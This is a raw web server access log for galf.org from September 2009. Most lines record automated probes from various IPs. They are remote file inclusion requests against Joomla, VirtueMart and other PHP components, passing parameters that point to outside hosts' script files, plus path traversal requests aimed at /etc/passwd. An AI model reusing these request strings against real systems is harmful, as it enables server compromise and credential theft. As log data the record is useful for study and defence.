218.38.243.71 - - [27/Sep/2009:18:14:57 -0700] "GET /logs/access_090831.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:15:34 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:15:39 -0700] "GET /logs/access_090831.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:15:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:17:07 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:17:07 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:17:07 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:17:39 -0700] "GET /logs/access_090608.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:17:46 -0700] "GET /logs/access_090608.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:18:17:52 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.202.66 - - [27/Sep/2009:18:18:42 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
211.43.202.66 - - [27/Sep/2009:18:18:42 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:19:25 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:19:27 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:19:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.93.88.26 - - [27/Sep/2009:18:19:57 -0700] "GET /?Site_Path=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:20:47 -0700] "GET /logs/access_090420.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:00 -0700] "GET /logs/access_090817.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:19 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:20 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:20 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:35 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:21:38 -0700] "GET /logs/access_090427.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:22:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:22:09 -0700] "GET /logs/access_090427.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:22:11 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:23:29 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:23:30 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.93.88.26 - - [27/Sep/2009:18:23:36 -0700] "GET /logs/access_090511.log/?Site_Path=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
193.93.88.26 - - [27/Sep/2009:18:23:36 -0700] "GET /?Site_Path=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.831" "www.galf.org"
193.93.88.26 - - [27/Sep/2009:18:23:37 -0700] "GET /logs/?Site_Path=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.831" "www.galf.org"
87.211.213.156 - - [27/Sep/2009:18:24:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.211.213.156 - - [27/Sep/2009:18:24:38 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:40 -0700] "GET /logs/access_090420.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:42 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:43 -0700] "GET /logs/access_090622.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:44 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:45 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:24:45 -0700] "GET /logs/access_090622.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.93.88.26 - - [27/Sep/2009:18:25:25 -0700] "GET /logs/access_090316.log/?Site_Path=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:25:32 -0700] "GET /logs/access_090525.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:03 -0700] "GET /logs/access_090525.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:06 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:06 -0700] "GET /logs/access_090622.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:06 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:24 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:26:27 -0700] "GET /logs/access_090622.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.211.213.156 - - [27/Sep/2009:18:27:22 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.211.213.156 - - [27/Sep/2009:18:27:24 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:27:27 -0700] "GET /logs/access_090608.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.243.71 - - [27/Sep/2009:18:28:05 -0700] "GET /logs/access_090608.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:18:33:53 -0700] "GET /logs/access_090622.log/phphtml.php?htmlclass_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:18:33:53 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:18:33:53 -0700] "GET /phphtml.php?htmlclass_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:34:04 -0700] "GET /logs/access_090629.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:34:04 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:34:05 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
94.75.245.36 - - [27/Sep/2009:18:35:35 -0700] "GET /logs/access_090629.log/phphtml.php?htmlclass_path=http://www.voyageclub.ru/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:36:02 -0700] "GET /logs/access_090629.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:36:02 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.54.154.10 - - [27/Sep/2009:18:36:02 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.76.47.207 - - [27/Sep/2009:18:45:43 -0700] "GET /index.php?pg=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
201.76.47.207 - - [27/Sep/2009:18:45:43 -0700] "GET /logs/index.php?pg=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:22 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:22 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:53 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:53 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:48:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:49:20 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.243.139.4 - - [27/Sep/2009:18:51:08 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:18:53:00 -0700] "GET /logs/access_090316.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:18:53:00 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:18:53:00 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.168.119 - - [27/Sep/2009:18:55:17 -0700] "GET /logs/access_090316.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
133.45.243.52 - - [27/Sep/2009:18:58:38 -0700] "GET /logs/access_090907.log HTTP/1.1" 200 3152962 "http://www.google.co.jp/search?hl=en&safe=off&client=firefox-a&rls=org.vinelinux%3Aja%3Aofficial&hs=ETQ&num=100&newwindow=1&q=203.189.46.118&btnG=Search&lr=" "Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.2) Gecko/20090807 Vine/3.5.2-3vl5 Firefox/3.5.2" "www.galf.org"
133.45.243.52 - - [27/Sep/2009:18:58:42 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.2) Gecko/20090807 Vine/3.5.2-3vl5 Firefox/3.5.2" "www.galf.org"
133.45.243.52 - - [27/Sep/2009:18:58:45 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.2) Gecko/20090807 Vine/3.5.2-3vl5 Firefox/3.5.2" "www.galf.org"
65.55.115.154 - - [27/Sep/2009:19:12:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.21 - - [27/Sep/2009:19:13:18 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
201.76.47.207 - - [27/Sep/2009:19:13:37 -0700] "GET /logs/access_090720.log/default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.76.47.207 - - [27/Sep/2009:19:13:38 -0700] "GET /default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.76.47.207 - - [27/Sep/2009:19:13:38 -0700] "GET /logs/default.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:19:14:50 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.225.253.135 - - [27/Sep/2009:19:14:50 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.225.253.135 - - [27/Sep/2009:19:14:50 -0700] "GET /logs/access.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:00 -0700] "GET /logs/access_090629.log/%3CHTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:00 -0700] "GET /logs/%3CHTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:00 -0700] "GET /%3CHTML%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:00 -0700] "GET /logs/access_090629.log/%3CHEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:00 -0700] "GET /logs/%3CHEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/access_090629.log/%3CTITLE%3E404%20Not%20Found%3C/TITLE%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /%3CHEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/%3CTITLE%3E404%20Not%20Found%3C/TITLE%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /%3CTITLE%3E404%20Not%20Found%3C/TITLE%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/%3C/HEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/access_090629.log/%3C/HEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /%3C/HEAD%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/%3CBODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/access_090629.log/%3CBODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /%3CBODY%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/access_090629.log/%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
